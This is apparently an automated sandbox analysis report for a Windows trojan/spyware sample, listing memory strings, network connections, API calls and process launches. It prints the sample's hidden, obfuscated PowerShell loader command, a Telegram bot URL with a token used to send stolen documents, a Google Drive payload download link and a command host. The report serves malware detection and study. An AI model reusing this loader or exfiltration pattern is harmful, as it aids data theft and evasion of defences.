Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.abraher.com
Source: Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.dr	String found in binary or memory: http://www.skinstudio.netG
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20a
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/N
Source: msiexec.exe, 00000005.00000002.2582595168.0000000000760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL
Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/A
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.0000000000518000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.0000000000518000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download
Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=downloadS
Source: msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=downloadXs
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D26000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.G
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.10:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052EE

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004032A0

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	File created: C:\Windows\resources\0809\relegationen	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	File created: C:\Windows\resources\0809\relegationen\ernringseksperternes	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00407040	0_2_00407040
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00406869	0_2_00406869
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Code function: 0_2_00404B2B	0_2_00404B2B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000EE988	5_2_000EE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E5321	5_2_000E5321
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E7118	5_2_000E7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E5370	5_2_000E5370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E3E12	5_2_000E3E12
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004253DC	5_2_004253DC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_0042C3B8	5_2_0042C3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00425788	5_2_00425788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00422800	5_2_00422800
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004259D8	5_2_004259D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00423B2C	5_2_00423B2C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24509C70	5_2_24509C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450FC68	5_2_2450FC68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24509548	5_2_24509548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24500040	5_2_24500040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450F810	5_2_2450F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24509C17	5_2_24509C17
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450501C	5_2_2450501C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24500026	5_2_24500026
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24505028	5_2_24505028
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450D0F8	5_2_2450D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450CCA0	5_2_2450CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450D550	5_2_2450D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24509544	5_2_24509544
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24502968	5_2_24502968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450DDFF	5_2_2450DDFF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450D9A7	5_2_2450D9A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450D9A8	5_2_2450D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450E257	5_2_2450E257
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450E258	5_2_2450E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24501E7F	5_2_24501E7F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450DE00	5_2_2450DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24501E80	5_2_24501E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450E6B0	5_2_2450E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450E6AF	5_2_2450E6AF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450EF51	5_2_2450EF51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450EF60	5_2_2450EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450EB08	5_2_2450EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24500B30	5_2_24500B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24500B2F	5_2_24500B2F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24508B95	5_2_24508B95
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450179C	5_2_2450179C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2450F3B8	5_2_2450F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_245017A0	5_2_245017A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_24508BA0	5_2_24508BA0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70

Source: Kb94RzMYNf.exe, 00000000.00000000.1312511296.0000000000453000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe
Source: Kb94RzMYNf.exe	Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe
Source: Kb94RzMYNf.exe.2.dr	Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe

Source: Kb94RzMYNf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@6/6

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

0_2_004032A0

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045AF

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

File created: C:\Users\user\AppData\Local\neoimpressionism

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

File created: C:\Users\user\AppData\Local\Temp\nsd98D9.tmp

Jump to behavior

Source: Kb94RzMYNf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Kb94RzMYNf.exe	Virustotal: Detection: 72%
Source: Kb94RzMYNf.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

File read: C:\Users\user\Desktop\Kb94RzMYNf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Kb94RzMYNf.exe "C:\Users\user\Desktop\Kb94RzMYNf.exe"
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kb94RzMYNf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
